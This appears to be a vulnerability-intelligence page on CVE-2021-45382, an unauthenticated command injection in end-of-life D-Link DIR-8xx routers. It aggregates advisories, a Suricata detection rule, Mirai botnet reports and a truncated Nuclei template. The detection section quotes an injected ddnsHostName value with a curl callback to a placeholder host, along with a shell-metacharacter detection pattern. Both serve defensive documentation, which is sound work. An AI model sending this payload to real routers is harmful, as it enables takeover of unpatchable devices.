CVE-2021-45382
published 2022-02-17CVE-2021-45382: A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via…
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-25
Exploited in the wild
EPSS
97.84%
99.9th percentile
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
Detection & IOCsextracted from sources · hover to see the quote
commandccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}↗
filenamencc2
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ddns_check.ccp"; fast_pattern; http.request_body; content:"&ddnsHostName="; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:cve,2021-45382; classtype:attempted-admin; sid:2035747; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_05, cve CVE_2021_45382, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_08;)
- →Exploit targets HTTP POST requests to the /ddns_check.ccp endpoint; inspect the ddnsHostName parameter for shell metacharacters (;, newline, &, backtick, |, $) immediately following the value.
- →The Nuclei template confirms exploitation via out-of-band HTTP callback (interactsh); look for outbound curl requests originating from D-Link router IPs as a post-exploitation indicator.
- →The vulnerability is unauthenticated and network-accessible (CVSS AV:N/AC:L/PR:N); no authentication bypass is required — any POST to /ddns_check.ccp with an injected ddnsHostName is a direct exploitation attempt.
- →The ET rule (SID 2035747) is tagged CISA_KEV and classified attempted-admin; deploy at both Perimeter and Internal network segments for full coverage.
- ·All affected D-Link models (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, DIR-836L) are End-of-Life/End-of-Service; no patch will be issued. Detection is the only mitigation short of device replacement. ↗
- ·CISA mandates disconnection of affected devices if still in use; passive detection rules alone are insufficient — asset inventory should be used to identify and isolate these routers. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5wgx-qvpv-2353: A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L route
ghsa_unreviewed·2022-02-18
CVE-2021-45382 [CRITICAL] CWE-77 GHSA-5wgx-qvpv-2353: A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L route
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
VulnCheck
D-Link Multiple Routers Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-45382 [CRITICAL] CWE-78 D-Link Multiple Routers Remote Code Execution Vulnerability
D-Link Multiple Routers Remote Code Execution Vulnerability
A remote code execution vulnerability exists in all series H/W revisions routers via the DDNS function in ncc2 binary file.
Affected: D-Link Multiple Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Exploitation References: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.cs.ucr.edu/~adava003/MalNet_IMC2022.pdf; https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=c
CISA
D-Link Multiple Routers Remote Code Execution Vulnerability
cisa·2022-04-04·CVSS 9.8
CVE-2021-45382 [CRITICAL] CWE-78 D-Link Multiple Routers Remote Code Execution Vulnerability
Vulnerability: D-Link Multiple Routers Remote Code Execution Vulnerability
Affected: D-Link Multiple Routers
A remote code execution vulnerability exists in all series H/W revisions routers via the DDNS function in ncc2 binary file.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-45382
Remediation Due Date: 2022-04-25
Suricata
ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)
suricata·2022-04-05·CVSS 9.8
CVE-2021-45382 [CRITICAL] ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)
ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ddns_check.ccp"; fast_pattern; http.request_body; content:"&ddnsHostName="; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:cve,2021-45382; classtype:attempted-admin; sid:2035747; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_05, cve CVE_2021_45382, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_08;)
Nuclei
D-Link - Remote Command Execution
nuclei·CVSS 9.8
CVE-2021-45382 [CRITICAL] D-Link - Remote Command Execution
D-Link - Remote Command Execution
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
Template:
id: CVE-2021-45382
info:
name: D-Link - Remote Command Execution
author: king-alexander
severity: critical
description: |
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
impact: |
Unauthenticated attackers can execute arbitrary system commands via command injection in the DDNS function, leading to complete router compromise and control over network traffic.
remediation: |
DIR-810L, DIR-820L, DIR-830L, DIR-8
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits
blogs_bleepingcomputer·2023-10-10·CVSS 9.8
[CRITICAL] Mirai DDoS malware variant expands targets with 13 router exploits
## Mirai DDoS malware variant expands targets with 13 router exploits
## Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
blogs_fortinet·2023-10-09·CVSS 9.8
[CRITICAL] IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link devices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
blogs_fortinet·2022-04-01·CVSS 9.8
[CRITICAL] Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
FORTIGUARD LABS THREAT RESEARCH
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
By Joie Salvio and Roy Tay | April 01, 2022
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.mdhttps://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.mdhttps://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45382
2022-02-17
Published
2022-04-04
Added to CISA KEV
Exploited in the wild